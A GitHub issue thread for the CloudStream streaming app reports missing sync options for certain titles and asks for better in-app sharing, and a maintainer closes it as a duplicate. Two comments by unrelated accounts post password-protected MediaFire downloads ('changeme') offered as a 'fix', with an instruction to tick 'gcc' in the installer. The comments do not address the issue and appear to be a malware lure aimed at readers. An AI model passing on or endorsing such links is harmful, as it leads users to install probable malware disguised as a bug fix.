### ISSUE TITLE
🔥 Title: Issues with Account Syncing & In-App Sharing

### ISSUE THREAD

**Issue by FUSIONOF** [recloudstream/cloudstream#1306]
### Steps to reproduce

🛠️ Steps to Reproduce:
Launch any version of the CloudStream app (Beta or Stable).
Search for the following titles:
Strangers From Hell (Asian Drama)
Classroom of the Elite Season 2 (Anime)
Junji Ito Maniac (Anime)
Tomie (Anime)
Midnight (Movie)
Unlocked (Movie)
Hunt (Movie)
Notice the missing option to sync these titles, even though they’re available on the syncing service's website.

### Expected behavior

🔮 Expected Behavior:
The app should allow syncing with the service for all titles available on the syncing platform's web version.

### ❌ **Actual Behavior:**

**Two Major Issues:**

1. **Syncing Issue:**  
   I recently created accounts on Simkl, MAL, and AniList to sync my watch progress. Unfortunately, some titles (listed above) don’t have a syncing option in both the stable and beta versions of the app. These titles are available on the syncing service's website but are missing the sync option in the app. 😕
   
2. **Sharing Problem:**  
   My sibling and I are regular users of CloudStream, but when she’s far away, it becomes a hassle! Searching through countless results from various websites, many of which have issues like not connecting, lacking my local language, or having poor quality, is frustrating. 😩  
   After finally finding the right stream, the sharing feature only sends the web link, not the direct stream link! This causes further problems, such as shortened URLs that require solving or links that only allow downloads instead of streaming. 🥲

   **Suggestion:** Could you enhance the in-app sharing by enabling direct sync between two CloudStream apps? If that's not possible, at least allow syncing the watch progress across shared accounts so that my sibling can directly access the stream I found without hassle! 😊

---

### 🌟 **Final Thoughts & Suggestions:**

- **In-App Extension Control:** It would be fantastic if the app could automatically disable non-connectable extensions (due to DNS issues or other reasons) to improve speed, reduce data usage, and simplify finding the best streaming option! 🚀
- **Overall Feedback:** Your app is already amazing—smooth, reliable, and user-friendly. Keep up the great work! 👍 Wishing you continued success in future updates and developments! 🎉

---

### Cloudstream version and commit hash

"4.4.0 2fc279f4"

### Android version

Android 14

### Logcat

```java
https://drive.google.com/file/d/1JItac4nybuFsphMI7_t1TwJf6xsDrAu8/view?usp=drivesdk
```

### Other details

🔍 Other Details:
Nothing else to add—everything’s covered above! 📝 If you need more info, feel free to ask. 😉

### Acknowledgements

- [X] I am sure my issue is related to the app and **NOT some extension**.
- [X] I have searched the existing issues and this is a new ticket, **NOT** a duplicate or related to another open issue.
- [X] I have written a short but informative title.
- [X] I have updated the app to pre-release version **[Latest](https://github.com/recloudstream/cloudstream/releases)**.
- [X] I will fill out all of the requested information in this form.

**Comment by rajnikyadav** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by fire-light42** [comment]
Duplicate + Extension issue
